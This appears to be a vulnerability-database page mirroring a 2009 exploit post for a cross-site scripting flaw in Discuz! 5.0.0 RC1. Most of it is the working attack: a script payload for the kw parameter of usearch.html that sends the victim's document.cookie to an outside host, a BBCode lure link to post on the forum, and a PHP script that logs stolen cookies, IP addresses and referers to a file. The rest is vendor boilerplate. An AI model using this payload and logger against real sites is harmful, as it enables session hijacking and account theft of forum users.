Lucene search
K

Xss Discuz! version 5.0.0 RC1

🗓️ 22 Dec 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 15 Views

XSS exploit in Xss Discuz! version 5.0.0 RC

Code

                                                Xss Discuz! version 5.0.0 RC1 
Author: SpiderZ 
Sito: http://www.spiderz.altervista.org 
Sito2: https://www.spiderz.netsons.org 
_________________________________________________________________________ 

Download Board : http://www.discuz.com 

File: usearch.html 
?site=www.discuz.net&kw= 

Message Script: 

 ">><script>document.location.replace('http://www.sitoweb.com/cookie.php?c='+document.cookie);</script> 

Message post: 

[url=www.sitoweb.com/usearch.html?site=www.discuz.net&kw=+ XSS]Premi qui[/url ] 

Cookie.php ( file.txt ) 

<?php 
$cookie = $_GET['c']; 
$ip = getenv ('REMOTE_ADDR'); 
$date=date("j F, Y, g:i a"); 
$referer=getenv ('HTTP_REFERER'); 
$fp = fopen('file.txt', 'a'); 
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>'); 
fclose($fp); 
?>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation